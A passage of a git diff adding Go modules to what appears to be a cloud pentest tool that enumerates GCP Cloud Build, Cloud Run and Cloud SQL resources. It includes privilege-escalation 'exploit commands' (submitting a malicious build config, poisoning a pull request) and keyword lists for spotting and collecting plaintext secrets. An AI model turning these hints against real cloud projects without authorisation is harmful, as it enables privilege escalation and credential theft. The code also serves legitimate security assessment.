Parse action + if rule.Action != nil { + lcRule.Action = rule.Action.Type + lcRule.StorageClass = rule.Action.StorageClass + + if rule.Action.Type == "Delete" { + bucket.HasDeleteRule = true + } else if rule.Action.Type == "SetStorageClass" { + bucket.HasArchiveRule = true + } + } + + // Parse conditions + if rule.Condition != nil { + // Age is a pointer to int64 + if rule.Condition.Age != nil && *rule.Condition.Age > 0 { + lcRule.AgeDays = *rule.Condition.Age + // Track shortest delete age + if lcRule.Action == "Delete" && (bucket.ShortestDeleteDays == -1 || *rule.Condition.Age < bucket.ShortestDeleteDays) { + bucket.ShortestDeleteDays = *rule.Condition.Age + } + } + if rule.Condition.NumNewerVersions > 0 { + lcRule.NumVersions = rule.Condition.NumNewerVersions + } + if rule.Condition.IsLive != nil { + lcRule.IsLive = rule.Condition.IsLive + } + if len(rule.Condition.MatchesPrefix) > 0 { + lcRule.MatchesPrefix = strings.Join(rule.Condition.MatchesPrefix, ",") + } + if len(rule.Condition.MatchesSuffix) > 0 { + lcRule.MatchesSuffix = strings.Join(rule.Condition.MatchesSuffix, ",") + } + if len(rule.Condition.MatchesStorageClass) > 0 { + lcRule.MatchesStorage = strings.Join(rule.Condition.MatchesStorageClass, ",") + } + if rule.Condition.CreatedBefore != "" { + lcRule.CreatedBefore = rule.Condition.CreatedBefore + } + if rule.Condition.DaysSinceCustomTime > 0 { + lcRule.DaysSinceCustom = rule.Condition.DaysSinceCustomTime + } + if rule.Condition.DaysSinceNoncurrentTime > 0 { + lcRule.DaysSinceNoncurrent = rule.Condition.DaysSinceNoncurrentTime + } + } + + bucket.LifecycleRules = append(bucket.LifecycleRules, lcRule) + } + + // If no delete rule, reset to 0 + if bucket.ShortestDeleteDays == -1 { + bucket.ShortestDeleteDays = 0 + } + } +} diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go new file mode 100644 index 00000000..8182266f --- /dev/null +++ 
b/gcp/services/cloudbuildService/cloudbuildService.go @@ -0,0 +1,358 @@ +package cloudbuildservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudbuild "google.golang.org/api/cloudbuild/v1" +) + +type CloudBuildService struct { + session *gcpinternal.SafeSession +} + +// New creates a new CloudBuildService +func New() *CloudBuildService { + return &CloudBuildService{} +} + +// NewWithSession creates a CloudBuildService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudBuildService { + return &CloudBuildService{session: session} +} + +// getService returns a Cloud Build service client using cached session if available +func (s *CloudBuildService) getService(ctx context.Context) (*cloudbuild.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudBuildService(ctx, s.session) + } + return cloudbuild.NewService(ctx) +} + +// TriggerInfo represents a Cloud Build trigger +type TriggerInfo struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + Disabled bool `json:"disabled"` + CreateTime string `json:"createTime"` + + // Source configuration + SourceType string `json:"sourceType"` // github, cloud_source_repos, etc. 
+ RepoName string `json:"repoName"` + BranchName string `json:"branchName"` + TagName string `json:"tagName"` + + // Build configuration + BuildConfigType string `json:"buildConfigType"` // yaml, dockerfile, inline + Filename string `json:"filename"` // cloudbuild.yaml path + ServiceAccount string `json:"serviceAccount"` // SA used for builds + Substitutions map[string]string `json:"substitutions"` + + // Security analysis + IsPublicRepo bool `json:"isPublicRepo"` + HasSecrets bool `json:"hasSecrets"` + PrivescPotential bool `json:"privescPotential"` +} + +// BuildInfo represents a Cloud Build execution +type BuildInfo struct { + ID string `json:"id"` + ProjectID string `json:"projectId"` + Status string `json:"status"` + CreateTime string `json:"createTime"` + StartTime string `json:"startTime"` + FinishTime string `json:"finishTime"` + TriggerID string `json:"triggerId"` + Source string `json:"source"` + ServiceAccount string `json:"serviceAccount"` + LogsBucket string `json:"logsBucket"` + Images []string `json:"images"` + // Pentest-specific fields + BuildSteps []BuildStep `json:"buildSteps"` + SecretEnvVars []string `json:"secretEnvVars"` + Artifacts []string `json:"artifacts"` +} + +// BuildStep represents a single step in a Cloud Build +type BuildStep struct { + Name string `json:"name"` // Container image + Args []string `json:"args"` // Command arguments + Entrypoint string `json:"entrypoint"` // Custom entrypoint + Env []string `json:"env"` // Environment variables + SecretEnv []string `json:"secretEnv"` // Secret environment variables + Volumes []string `json:"volumes"` // Mounted volumes +} + +// TriggerSecurityAnalysis contains detailed security analysis +type TriggerSecurityAnalysis struct { + TriggerName string `json:"triggerName"` + ProjectID string `json:"projectId"` + ServiceAccount string `json:"serviceAccount"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + 
PrivescPotential bool `json:"privescPotential"` +} + +// ListTriggers retrieves all Cloud Build triggers in a project +func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + + var triggers []TriggerInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Triggers.List(parent) + err = req.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err != nil { + // Try with just project ID (older API) + req2 := service.Projects.Triggers.List(projectID) + err2 := req2.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err2 != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + } + + return triggers, nil +} + +// ListBuilds retrieves recent Cloud Build executions +func (s *CloudBuildService) ListBuilds(projectID string, limit int64) ([]BuildInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + + var builds []BuildInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Builds.List(parent).PageSize(limit) + resp, err := req.Do() + if err != nil { + // Try with just project ID + req2 := service.Projects.Builds.List(projectID).PageSize(limit) + resp, err = req2.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + } + + for _, build := range 
resp.Builds { + info := BuildInfo{ + ID: build.Id, + ProjectID: projectID, + Status: build.Status, + CreateTime: build.CreateTime, + StartTime: build.StartTime, + FinishTime: build.FinishTime, + ServiceAccount: build.ServiceAccount, + LogsBucket: build.LogsBucket, + Images: build.Images, + } + if build.BuildTriggerId != "" { + info.TriggerID = build.BuildTriggerId + } + if build.Source != nil && build.Source.RepoSource != nil { + info.Source = build.Source.RepoSource.RepoName + } + + // Parse build steps for pentest analysis + for _, step := range build.Steps { + if step == nil { + continue + } + bs := BuildStep{ + Name: step.Name, + Args: step.Args, + Entrypoint: step.Entrypoint, + Env: step.Env, + SecretEnv: step.SecretEnv, + } + for _, vol := range step.Volumes { + if vol != nil { + bs.Volumes = append(bs.Volumes, vol.Name+":"+vol.Path) + } + } + info.BuildSteps = append(info.BuildSteps, bs) + info.SecretEnvVars = append(info.SecretEnvVars, step.SecretEnv...) + } + + // Parse artifacts + if build.Artifacts != nil { + info.Artifacts = build.Artifacts.Images + } + + builds = append(builds, info) + } + + return builds, nil +} + +// AnalyzeTriggerForPrivesc performs detailed privesc analysis on a trigger +func (s *CloudBuildService) AnalyzeTriggerForPrivesc(trigger TriggerInfo, projectID string) TriggerSecurityAnalysis { + analysis := TriggerSecurityAnalysis{ + TriggerName: trigger.Name, + ProjectID: projectID, + ServiceAccount: trigger.ServiceAccount, + RiskReasons: []string{}, + } + + score := 0 + + // Check service account privileges + if trigger.ServiceAccount == "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Uses default Cloud Build SA (often has broad permissions)") + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Default SA often has: storage.admin, source.admin, artifactregistry.admin\n"+ + "gcloud builds submit --config=malicious.yaml --project=%s", projectID)) + score += 2 + analysis.PrivescPotential = true + } 
else { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Build runs as: %s\n"+ + "# Check SA permissions:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'", + trigger.ServiceAccount, projectID, trigger.ServiceAccount)) + } + + // GitHub PR triggers are exploitable + if trigger.SourceType == "github" && trigger.BranchName != "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "GitHub trigger may execute code from pull requests") + analysis.ExploitCommands = append(analysis.ExploitCommands, + "# Fork repo, submit PR with malicious cloudbuild.yaml to trigger build") + score += 2 + } + + // Inline build configs might leak secrets + if trigger.BuildConfigType == "inline" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Inline build config may contain hardcoded secrets or commands") + score += 1 + } + + // Secrets in substitutions + if trigger.HasSecrets { + analysis.RiskReasons = append(analysis.RiskReasons, + "Trigger uses substitution variables that may contain secrets") + score += 1 + } + + // Add exploitation guidance + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Trigger a build manually:\n"+ + "gcloud builds triggers run %s --project=%s --branch=%s", + trigger.ID, projectID, trigger.BranchName)) + + if score >= 3 { + analysis.RiskLevel = "HIGH" + } else if score >= 2 { + analysis.RiskLevel = "MEDIUM" + } else { + analysis.RiskLevel = "LOW" + } + + return analysis +} + +// parseTrigger converts a trigger to TriggerInfo +func (s *CloudBuildService) parseTrigger(trigger *cloudbuild.BuildTrigger, projectID string) TriggerInfo { + info := TriggerInfo{ + ID: trigger.Id, + Name: trigger.Name, + Description: trigger.Description, + ProjectID: projectID, + Disabled: trigger.Disabled, + CreateTime: trigger.CreateTime, + Substitutions: trigger.Substitutions, + } + + // Parse source configuration + if trigger.Github != nil { + info.SourceType = 
"github" + info.RepoName = fmt.Sprintf("%s/%s", trigger.Github.Owner, trigger.Github.Name) + if trigger.Github.Push != nil { + info.BranchName = trigger.Github.Push.Branch + info.TagName = trigger.Github.Push.Tag + } + if trigger.Github.PullRequest != nil { + info.BranchName = trigger.Github.PullRequest.Branch + } + } else if trigger.TriggerTemplate != nil { + info.SourceType = "cloud_source_repos" + info.RepoName = trigger.TriggerTemplate.RepoName + info.BranchName = trigger.TriggerTemplate.BranchName + info.TagName = trigger.TriggerTemplate.TagName + } + + // Parse build configuration + if trigger.Filename != "" { + info.BuildConfigType = "yaml" + info.Filename = trigger.Filename + } else if trigger.Build != nil { + info.BuildConfigType = "inline" + } + + // Service account + if trigger.ServiceAccount != "" { + info.ServiceAccount = trigger.ServiceAccount + } + + // Check for secrets in substitutions + for key := range trigger.Substitutions { + if containsSecretKeyword(key) { + info.HasSecrets = true + break + } + } + + // Determine privesc potential + // Default SA is often over-privileged, GitHub triggers can execute untrusted code + if info.ServiceAccount == "" { + info.PrivescPotential = true + } + if info.SourceType == "github" && info.BranchName != "" { + info.PrivescPotential = true + } + + return info +} + +// containsSecretKeyword checks if a key might contain secrets +func containsSecretKeyword(key string) bool { + secretKeywords := []string{"SECRET", "PASSWORD", "TOKEN", "KEY", "CREDENTIAL", "AUTH"} + for _, keyword := range secretKeywords { + if containsIgnoreCase(key, keyword) { + return true + } + } + return false +} + +func containsIgnoreCase(s, substr string) bool { + return strings.Contains(strings.ToUpper(s), strings.ToUpper(substr)) +} diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go new file mode 100644 index 00000000..fdfbc617 --- /dev/null +++ 
b/gcp/services/cloudrunService/cloudrunService.go @@ -0,0 +1,721 @@ +package cloudrunservice + +import ( + "context" + "fmt" + "strings" + "sync" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + run "google.golang.org/api/run/v2" +) + +type CloudRunService struct{ + session *gcpinternal.SafeSession +} + +func New() *CloudRunService { + return &CloudRunService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CloudRunService { + return &CloudRunService{ + session: session, + } +} + +func (crs *CloudRunService) getServiceV2(ctx context.Context) (*run.Service, error) { + if crs.session != nil { + return sdk.CachedGetCloudRunServiceV2(ctx, crs.session) + } + return run.NewService(ctx) +} + +// ServiceInfo holds Cloud Run service details with security-relevant information +type ServiceInfo struct { + // Basic info + Name string + ProjectID string + Region string + Description string + Creator string + UpdateTime string + + // URL and traffic + URL string + LatestRevision string + LatestReadyRevision string + TrafficAllOnLatest bool + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // INGRESS_TRAFFIC_ALL, INGRESS_TRAFFIC_INTERNAL_ONLY, INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER + VPCAccess string // VPC Connector or Direct VPC + VPCEgressSettings string // ALL_TRAFFIC, PRIVATE_RANGES_ONLY + BinaryAuthorizationPolicy string + + // Container configuration + ContainerImage string + ContainerPort int64 + CPULimit string + MemoryLimit string + MaxInstances int64 + MinInstances int64 + Timeout string + + // Environment variables (counts, not values) + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret // Potential secrets in env vars (not using Secret Manager) + UsesDefaultSA bool // Uses default compute service account 
+ + // Detailed env var and secret info + EnvVars []EnvVarInfo // All environment variables + SecretRefs []SecretRefInfo // All Secret Manager references + + // IAM + InvokerMembers []string + IsPublic bool + IAMBindings []IAMBinding // All IAM bindings on this service + + // Status + Status string // Service status +} + +// HardcodedSecret represents a potential secret found in environment variables +type HardcodedSecret struct { + EnvVarName string + SecretType string // password, api-key, token, credential, connection-string +} + +// EnvVarInfo represents an environment variable configuration +type EnvVarInfo struct { + Name string + Value string // Direct value (may be empty if using secret ref) + Source string // "direct", "secret-manager", or "config-map" + // For Secret Manager references + SecretName string + SecretVersion string +} + +// SecretRefInfo represents a Secret Manager reference used by the service +type SecretRefInfo struct { + EnvVarName string // The env var name that references this secret + SecretName string // Secret Manager secret name + SecretVersion string // Version (e.g., "latest", "1") + MountPath string // For volume mounts, the path where it's mounted + Type string // "env" or "volume" +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// JobInfo holds Cloud Run job details +type JobInfo struct { + Name string + ProjectID string + Region string + ServiceAccount string + ContainerImage string + LastExecution string + Creator string + UpdateTime string + + // Configuration + TaskCount int64 + Parallelism int64 + MaxRetries int64 + Timeout string + + // VPC Access + VPCAccess string + VPCEgressSettings string + + // Environment + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret + UsesDefaultSA bool + + // Detailed env var and secret info + EnvVars []EnvVarInfo + SecretRefs []SecretRefInfo + + 
// IAM + IAMBindings []IAMBinding // All IAM bindings on this job + + // Status + Status string +} + +// Services retrieves all Cloud Run services in a project across all regions +// Note: This excludes Cloud Functions 2nd gen which are deployed as Cloud Run services +// but should be enumerated via the functions module instead +func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { + ctx := context.Background() + + service, err := cs.getServiceV2(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + var services []ServiceInfo + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Services.List(parent) + err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error { + for _, svc := range page.Services { + // Skip Cloud Functions 2nd gen - they have label "goog-managed-by: cloudfunctions" + // These should be enumerated via the functions module, not cloudrun + if isCloudFunction(svc.Labels) { + continue + } + + info := parseServiceInfo(svc, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := cs.getServiceIAMPolicy(service, svc.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.InvokerMembers, info.IsPublic = parseAllIAMBindings(iamPolicy) + } + + services = append(services, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + return services, nil +} + +// isCloudFunction checks if a Cloud Run service is actually a Cloud Function 2nd gen +// Cloud Functions 2nd gen are deployed as Cloud Run services but have specific labels +func isCloudFunction(labels map[string]string) bool { + if labels == nil { + return false + } + // Cloud Functions 2nd gen have "goog-managed-by: cloudfunctions" label + if managedBy, ok := labels["goog-managed-by"]; ok && managedBy == "cloudfunctions" { + return true + } + 
return false +} + +// Jobs retrieves all Cloud Run jobs in a project across all regions +// Note: The Cloud Run Jobs API does NOT support the "-" wildcard for locations +// unlike the Services API, so we must iterate through regions explicitly +func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := cs.getServiceV2(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + var jobs []JobInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // Iterate through all Cloud Run regions in parallel + for _, region := range regions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, region) + + call := service.Projects.Locations.Jobs.List(parent) + err := call.Pages(ctx, func(page *run.GoogleCloudRunV2ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + + // Try to get IAM policy for job + iamPolicy, iamErr := cs.getJobIAMPolicy(service, job.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, _, _ = parseAllIAMBindings(iamPolicy) + } + + mu.Lock() + jobs = append(jobs, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have jobs or API may not be enabled + // Common errors: 404 (no jobs in region), 403 (permission denied) + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } + + wg.Wait() + + // Only return error if we got no jobs AND had errors + // If we found jobs in some regions, that's 
success + if len(jobs) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "run.googleapis.com") + } + + return jobs, nil +} + +// parseServiceInfo extracts relevant information from a Cloud Run service +func parseServiceInfo(svc *run.GoogleCloudRunV2Service, projectID string) ServiceInfo { + info := ServiceInfo{ + Name: extractName(svc.Name), + ProjectID: projectID, + Description: svc.Description, + Creator: svc.Creator, + UpdateTime: svc.UpdateTime, + URL: svc.Uri, + } + + // Parse conditions for status + if len(svc.Conditions) > 0 { + for _, cond := range svc.Conditions { + if cond.Type == "Ready" { + if cond.State == "CONDITION_SUCCEEDED" { + info.Status = "Ready" + } else { + info.Status = cond.State + if cond.Reason != "" { + info.Status = cond.Reason + } + } + break + } + } + } + if info.Status == "" { + info.Status = "Unknown" + } + + // Extract region from service name + // Format: projects/{project}/locations/{location}/services/{name} + parts := strings.Split(svc.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Ingress settings + info.IngressSettings = svc.Ingress + + // Latest revision info + info.LatestRevision = svc.LatestCreatedRevision + info.LatestReadyRevision = svc.LatestReadyRevision + + // Check if all traffic goes to latest + for _, traffic := range svc.Traffic { + if traffic.Type == "TRAFFIC_TARGET_ALLOCATION_TYPE_LATEST" && traffic.Percent == 100 { + info.TrafficAllOnLatest = true + break + } + } + + // Binary authorization + if svc.BinaryAuthorization != nil { + info.BinaryAuthorizationPolicy = svc.BinaryAuthorization.Policy + if svc.BinaryAuthorization.UseDefault { + info.BinaryAuthorizationPolicy = "default" + } + } + + // Template configuration (current revision settings) + if svc.Template != nil { + info.ServiceAccount = svc.Template.ServiceAccount + info.Timeout = svc.Template.Timeout + + if svc.Template.Scaling != nil { + info.MaxInstances = svc.Template.Scaling.MaxInstanceCount + 
info.MinInstances = svc.Template.Scaling.MinInstanceCount + } + + // VPC access configuration + if svc.Template.VpcAccess != nil { + info.VPCAccess = svc.Template.VpcAccess.Connector + info.VPCEgressSettings = svc.Template.VpcAccess.Egress + if info.VPCAccess == "" && svc.Template.VpcAccess.NetworkInterfaces != nil { + info.VPCAccess = "Direct VPC" + } + } + + // Container configuration + if len(svc.Template.Containers) > 0 { + container := svc.Template.Containers[0] + info.ContainerImage = container.Image + + // Port + if len(container.Ports) > 0 { + info.ContainerPort = container.Ports[0].ContainerPort + } + + // Resources + if container.Resources != nil { + if container.Resources.Limits != nil { + if cpu, ok := container.Resources.Limits["cpu"]; ok { + info.CPULimit = cpu + } + if mem, ok := container.Resources.Limits["memory"]; ok { + info.MemoryLimit = mem + } + } + } + + // Environment variables + info.EnvVarCount = len(container.Env) + + // Process each environment variable + for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference + info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value + } + + info.EnvVars = append(info.EnvVars, envInfo) + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + // Check if this volume is a secret + for _, svcVol := range svc.Template.Volumes { + if svcVol.Name == vol.Name && svcVol.Secret != nil { + info.SecretVolumeCount++ + 
info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: svcVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) + break + } + } + } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) + } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) + } + + return info +} + +// parseJobInfo extracts relevant information from a Cloud Run job +func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Creator: job.Creator, + UpdateTime: job.UpdateTime, + } + + // Extract region from job name + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Parse conditions for status + if len(job.Conditions) > 0 { + for _, cond := range job.Conditions { + if cond.Type == "Ready" { + if cond.State == "CONDITION_SUCCEEDED" { + info.Status = "Ready" + } else { + info.Status = cond.State + if cond.Reason != "" { + info.Status = cond.Reason + } + } + break + } + } + } + if info.Status == "" { + info.Status = "Unknown" + } + + // Last execution + if job.LatestCreatedExecution != nil { + info.LastExecution = job.LatestCreatedExecution.Name + } + + // Template configuration + if job.Template != nil { + info.TaskCount = job.Template.TaskCount + info.Parallelism = job.Template.Parallelism + + if job.Template.Template != nil { + info.MaxRetries = job.Template.Template.MaxRetries + info.Timeout = job.Template.Template.Timeout + info.ServiceAccount = job.Template.Template.ServiceAccount + + // VPC access configuration + if job.Template.Template.VpcAccess != nil { + info.VPCAccess = job.Template.Template.VpcAccess.Connector + info.VPCEgressSettings = job.Template.Template.VpcAccess.Egress + if info.VPCAccess == "" && job.Template.Template.VpcAccess.NetworkInterfaces != nil { + 
info.VPCAccess = "Direct VPC" + } + } + + // Container configuration + if len(job.Template.Template.Containers) > 0 { + container := job.Template.Template.Containers[0] + info.ContainerImage = container.Image + + // Environment variables + info.EnvVarCount = len(container.Env) + + // Process each environment variable + for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference + info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value + } + + info.EnvVars = append(info.EnvVars, envInfo) + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + for _, jobVol := range job.Template.Template.Volumes { + if jobVol.Name == vol.Name && jobVol.Secret != nil { + info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: jobVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) + break + } + } + } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) + } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) + } + } + + return info +} + +// getServiceIAMPolicy retrieves the IAM policy for a Cloud Run service +func (cs *CloudRunService) getServiceIAMPolicy(service *run.Service, serviceName string) (*run.GoogleIamV1Policy, error) { + ctx := context.Background() + + policy, err := 
service.Projects.Locations.Services.GetIamPolicy(serviceName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// getJobIAMPolicy retrieves the IAM policy for a Cloud Run job +func (cs *CloudRunService) getJobIAMPolicy(service *run.Service, jobName string) (*run.GoogleIamV1Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Jobs.GetIamPolicy(jobName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseAllIAMBindings extracts all IAM bindings, invokers, and checks for public access +func parseAllIAMBindings(policy *run.GoogleIamV1Policy) ([]IAMBinding, []string, bool) { + var allBindings []IAMBinding + var invokers []string + isPublic := false + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + allBindings = append(allBindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + + // Check for invoker role + if binding.Role == "roles/run.invoker" { + invokers = append(invokers, binding.Members...) 
			// Check for public access: allUsers (anonymous) or
			// allAuthenticatedUsers (any Google account) holding run.invoker
			// means the service is callable without project-level IAM grants.
			for _, member := range binding.Members {
				if member == "allUsers" || member == "allAuthenticatedUsers" {
					isPublic = true
				}
			}
		}
	}

	return allBindings, invokers, isPublic
}

// extractName extracts just the resource name from the full resource name
// (e.g. "projects/p/locations/l/services/svc" -> "svc").
// NOTE(review): strings.Split never returns an empty slice, so the guard
// below is always true; kept for readability.
func extractName(fullName string) string {
	parts := strings.Split(fullName, "/")
	if len(parts) > 0 {
		return parts[len(parts)-1]
	}
	return fullName
}

// secretPatterns maps env var name patterns to secret types.
// Matching is done with strings.Contains on the upper-cased env var name, so
// broad entries like "SECRET" and "TOKEN" also match more specific keys
// (e.g. "JWT_SECRET" matches both "SECRET" and "JWT_SECRET"); overlapping
// entries intentionally coexist.
var secretPatterns = map[string]string{
	"PASSWORD":          "password",
	"PASSWD":            "password",
	"SECRET":            "secret",
	"API_KEY":           "api-key",
	"APIKEY":            "api-key",
	"API-KEY":           "api-key",
	"TOKEN":             "token",
	"ACCESS_TOKEN":      "token",
	"AUTH_TOKEN":        "token",
	"BEARER":            "token",
	"CREDENTIAL":        "credential",
	"PRIVATE_KEY":       "credential",
	"PRIVATEKEY":        "credential",
	"CONNECTION_STRING": "connection-string",
	"CONN_STR":          "connection-string",
	"DATABASE_URL":      "connection-string",
	"DB_PASSWORD":       "password",
	"DB_PASS":           "password",
	"MYSQL_PASSWORD":    "password",
	"POSTGRES_PASSWORD": "password",
	"REDIS_PASSWORD":    "password",
	"MONGODB_URI":       "connection-string",
	"AWS_ACCESS_KEY":    "credential",
	"AWS_SECRET":        "credential",
	"AZURE_KEY":         "credential",
	"GCP_KEY":           "credential",
	"ENCRYPTION_KEY":    "credential",
	"SIGNING_KEY":       "credential",
	"JWT_SECRET":        "credential",
	"SESSION_SECRET":    "credential",
	"OAUTH":             "credential",
	"CLIENT_SECRET":     "credential",
}

// detectHardcodedSecrets analyzes env vars to find potential hardcoded secrets.
// Env vars backed by Secret Manager references are skipped (that is the safe
// pattern), as are empty values; only direct plaintext values whose names
// look secret-like are reported.
func detectHardcodedSecrets(envVars []*run.GoogleCloudRunV2EnvVar) []HardcodedSecret {
	var secrets []HardcodedSecret

	for _, env := range envVars {
		if env == nil {
			continue
		}

		// Skip if using Secret Manager reference
		if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil {
			continue
		}

		// Only flag if there's a direct value (not empty)
		if env.Value == "" {
			continue
} + + envNameUpper := strings.ToUpper(env.Name) + + for pattern, secretType := range secretPatterns { + if strings.Contains(envNameUpper, pattern) { + secrets = append(secrets, HardcodedSecret{ + EnvVarName: env.Name, + SecretType: secretType, + }) + break + } + } + } + + return secrets +} + +// isDefaultServiceAccount checks if the service account is a default compute SA +func isDefaultServiceAccount(sa, projectID string) bool { + if sa == "" { + return true // Empty means using default + } + // Default compute SA pattern: {project-number}-compute@developer.gserviceaccount.com + return strings.Contains(sa, "-compute@developer.gserviceaccount.com") +} diff --git a/gcp/services/cloudsqlService/cloudsqlService.go b/gcp/services/cloudsqlService/cloudsqlService.go new file mode 100644 index 00000000..59004994 --- /dev/null +++ b/gcp/services/cloudsqlService/cloudsqlService.go @@ -0,0 +1,283 @@ +package cloudsqlservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + sqladmin "google.golang.org/api/sqladmin/v1" +) + 